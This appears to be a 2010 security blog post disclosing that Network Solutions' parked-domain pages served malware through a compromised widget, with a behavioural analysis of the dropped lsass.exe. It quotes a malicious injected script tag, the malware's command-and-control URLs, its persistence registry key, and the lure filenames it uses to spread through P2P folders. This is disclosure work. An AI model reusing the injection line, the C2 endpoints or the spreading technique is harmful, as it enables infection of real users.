(see Part 1 here)
(please see our follow-up post if you have time)
A few days ago, in response to questions by one of our largest customers, we analyzed a widget by Network Solutions, confirmed that it was infected, and published the last blog "SMCI widget and growsmartbusiness.com by Network Solutions still serving malware."
It was actually a report that we wrote for this customer, to assure them that although other detection mechanisms aren't flagging, that we are rightfully flagging these pages as malicious.
Soon after publishing the blog, we realized that it was the same widget that got the boingboing.com parked domain infected, which we blogged about back in May.
Yesterday I had some time to sit down and study this widget further, and discovered something critical--it's a part of the standard domain parking page of Network Solutions.
And so, just how many domains (not pages) are currently affected and serving malware?
More than 500,000 domains, according to Google:
According to Yahoo, add a zero to that, at least 5,000,000 domains:
I didn't have time to click on every single one of them, but I clicked on enough to conclude that, all of them are indeed infected, via the same widget we blogged about a few days ago. Also, neither Google or Yahoo actually shows all results. Google shows the first 45 pages only, and Yahoo shows the first 100 only. So we couldn't really go through all the domains one by one...and 5 million is too large a number for manual verification anyways.
Deciding to look a bit deeper to see if there are other infections, I realized that there is. The behavior is quite the same as our boingboing.com alert back in May.
One infection, in addition to the widget, is this:
<script src=" http://www.asiappc.com/sp/newskbanner/728x90.js" language="JavaScript" charset="gb2312"></script>
Analyzing this and comparing traffic logs of the boingboing.com post back in May, we concluded the the attacker uses the following free traffic analysis services, which are the two most popular choice among attackers in greater China--cnzz and 51.la. Specifically, the following accounts are used:
1. 51.la ID 3542139
2. cnzz.com ID 1803216
Since both accounts were registered with handle "skbanner," we assume it's not multiple infections by different attackers but the same attacker using two counters. The 51.la account can be accessed:
First, the account was registered on Feb 5th. A day later, on Feb 6th, Tata Consulting Services, who uses Network Solutions as domain registrar, had their DNS records manipulated, according to TechCrunch and other media. This all happened shortly after Jan 19th, when Network Solutions publicly addressed that some of their sites have been hacked and they are addressing the problem.
The 51.la "skbanner" counter recorded 2,683,120 accumulative page views--that's a lot of victims out there.
The highest page view was seen on April 3rd, 2010. This time frame is close to the largest incident in this series--on April 7th, WordPress admins started to post on the WordPress Forum complaining that their WordPress on Network Solutions has been compromised and were serving malware. That thread had 151 posts total.
Network Solutions acknowledged the problem on April 9th with a blog post Alert: WordPress Blog & Network Solutions. If these events were associated, then sometime in early April the attacker group must have decided to leverage the control they had of Network Solutions, and massively injected malicious content not into the default parked domain page, but rather, into the hosted WordPress blogs and / or websites.
It's concerning that this series of compromises happened starting Jan of this year, and today we are still seeing more than 500,000 Network Solutions domains actively serving malware as we write.
We also just registered a domain, armorizetest.com, with Network Solutions, and verified that it indeed actively serves malware the moment that it's up. Here's what we did:
First we paid for our domain:
Then we set it to park using the "standard construction page":
It's done. We connect to our newly purchased and parked domain, and as you can see, the fake (and malicious) QQ messagebox pops up, and the compromised (and malicious) Network Solutions SMCI widget is there, too. From the traffic, yes, it's serving malicious content, which is the same as described in our last blog post.
One of the dropped malware executable is: C:\Documents and Settings\Administrator\Application Data\SystemProc\lsass.exe
The hidden directory SystemProc is created by a javascript exploit.
VirusTotal says that the detection rate by antivurs companies for this lsass.exe file is exactly 50%--21 out of 42 antivirus solutions can detect this file.
We have prepared a demo video here:
Follow-up:
We have managed to get in touch with Network Solutions, and within less than three hours, they have acted and taken down the widget. Actually, they have commented the code out, so you can still see it if you "view source."
At the same time, while trying to figure out the exact number of affected domains, we realized that Yahoo is probably more correct on this--it was more than five million domains! Here's a video:
Finally, as to the dropped malware lsass.exe itself, here's what it does (credits to Chris Hsiao):
When run, itcreates the following components:
========================================================
%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\install.rdf
%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\chrome.manifest
%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\chrome\content\timer.xul
%USERPROFILE%\Application Data\SystemProc\lsass.exe
The following registry key is added in order to auto start itself after reboot:
=========================================================
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RTHDBPL" = "%appdata%\SystemProc\lsass.exe"
It monitors the following Web browsers:
=========================================================
Explorer
Opera
Chrome
Firefox
User searches using the following search engines are redirected to another Web site:
===========================================================
Ask
Yahoo!
AOL
Bing
It monitors the following search terms and pops up advertisement accordingly:
============================================================
cialis
pharma
casino
finance
mortgage
insurance
gambling
health
hotel
travel
antivirus
antivir
pocker
poker
video
baby
bany
porn
golf
diet
vocations
design
graphic
football
footbal
estate
baseball
shop
books
gifts
money
spyware
credit
loans
loan
dating
ebay
myspace
virus
film
ipod
verizon
amazon
iphone
software
movie
mobile
bank
music
cars
craigslist
game
sport
medical
school
wallpaper
military
weather
fashion
spybot
trading
tramadol
yobt
flower
cigarettes
doctor
flights
airlines
comcast
It searches for the following directories:
======================================================
C:\program files\winmx\shared\
C:\program files\tesla\files\
C:\program files\limewire\shared\
C:\program files\morpheus\my shared folder\
C:\program files\emule\incoming\
C:\program files\edonkey2000\incoming\
C:\program files\bearshare\shared\
C:\program files\grokster\my grokster\
C:\program files\icq\shared folder\
C:\program files\kazaa lite k++\my shared folder\
C:\program files\kazaa lite\my shared folder\
C:\program files\kazaa\my shared folder\
If any of the above directories are found, it duplicates itself (lsass.exe) into the directories. It renames itself into the following names:
===========================================================
YouTubeGet 5.6.exe
Youtube Music Downloader 1.3.exe
WinRAR v3.x keygen [by HiXem].exe
Windows2008 keygen and activator.exe
[+ MrKey +] Windows XP PRO Corp SP3 valid-key generator.exe
Windows Password Cracker + Elar3 key.exe
[Eni0j0 team] Windows 7 Ultimate keygen.exe
Windows 2008 Enterprise Server VMWare Virtual Machine.exe
Winamp.Pro.v7.xx.PowerPack.Portable+installer.exe
Website Hacker.exe
[Eni0j0 team] Vmvare keygen.exe
VmWare 7.x keygen.exe
UT 2003 KeyGen.exe
Twitter FriendAdder 2.3.9.exe
Tuneup Ultilities 2010.exe
[antihack tool] Trojan Killer v2.9.4173.exe
Total Commander7 license+keygen.exe
Super Utilities Pro 2009 11.0.exe
Sub7 2.5.1 Private.exe
Sophos antivirus updater bypass.exe
sdbot with NetBIOS Spread.exe
[fixed]RapidShare Killer AIO 2010.exe
Rapidshare Auto Downloader 3.8.6.exe
Power ISO v4.4 + keygen milon.exe
[patched, serial not needed] PDF Unlocker v2.0.5.exePDF-XChange Pro.exe
[patched, serial not needed] PDF to Word Converter 3.4.exe
PDF password remover (works with all acrobat reader).exe
Password Cracker.exe
Norton Internet Security 2010 crack.exe
Norton Anti-Virus 2010 Enterprise Crack.exe
Norton Anti-Virus 2005 Enterprise Crack.exe
NetBIOS Hacker.exe
NetBIOS Cracker.exe
[patched, serial not need] Nero 9.x keygen.exe
Myspace theme collection.exe
MSN Password Cracker.exe
Mp3 Splitter and Joiner Pro v3.48.exe
Motorola, nokia, ericsson mobil phone tools.exe
Microsoft.Windows 7 ULTIMATE FINAL activator+keygen x86.exe
Microsoft Visual Studio KeyGen.exe
Microsoft Visual C++ KeyGen.exe
Microsoft Visual Basic KeyGen.exe
McAfee Total Protection 2010 [serial patch by AnalGin].exe
Magic Video Converter 8.exe
LimeWire Pro v4.18.3 [Cracked by AnalGin].exe
L0pht 4.0 Windows Password Cracker.exe
K-Lite Mega Codec v5.2 Portable.exe
K-Lite Mega Codec v5.2.exe
Keylogger unique builder.exe
Kaspersky Internet Security 2010 keygen.exe
Kaspersky AntiVirus 2010 crack.exe
IP Nuker.exe
Internet Download Manager V5.exe
Image Size Reducer Pro v1.0.1.exe
ICQ Hacker Trial version [brute].exe
Hotmail Hacker [Brute method].exe
Hotmail Cracker [Brute method].exe
Half-Life 2 Downloader.exe
Grand Theft Auto IV [Offline Activation + mouse patch].exe
Google SketchUp 7.1 Pro.exe
G-Force Platinum v3.7.6.exe
FTP Cracker.exe
DVD Tools Nero 10.x.x.x.exe
Download Boost 2.0.exe
Download Accelerator Plus v9.2.exe
Divx Pro 7.x version Keymaker.exe
DivX 5.x Pro KeyGen generator.exe
DCOM Exploit archive.exe
Daemon Tools Pro 4.8.exe
Counter-Strike Serial key generator [Miona patch].exe
CleanMyPC Registry Cleaner v6.02.exe
Brutus FTP Cracker.exe
Blaze DVD Player Pro v6.52.exe
BitDefender AntiVirus 2010 Keygen.exe
Avast 5.x Professional.exe
Avast 4.x Professional.exe
Ashampoo Snap 3.xx [Skarleot Group].exe
AOL Password Cracker.exe
AOL Instant Messenger (AIM) Hacker.exe
AnyDVD HD v.6.3.1.8 Beta incl crack.exe
Anti-Porn v13.x.x.x.exe
Alcohol 120 v1.9.x.exe
Adobe Photoshop CS4 crack by M0N5KI Hack Group.exe
Adobe Illustrator CS4 crack.exe
Adobe Acrobat Reader keygen.exe
Ad-aware 2010.exe
[patched, serial not needed] Absolute Video Converter 6.2-7.exe
It retrieves the following URLs to fetch commands and download more malware (link currently not working):
======================================================
http://updrandomhottys.com/update.php?sd=2010-03-23&aid=blackout
http://updrandomhottys.com/inst.php?aid=blackout
(please see our follow-up post if you have time)
Read more (rest of article)...
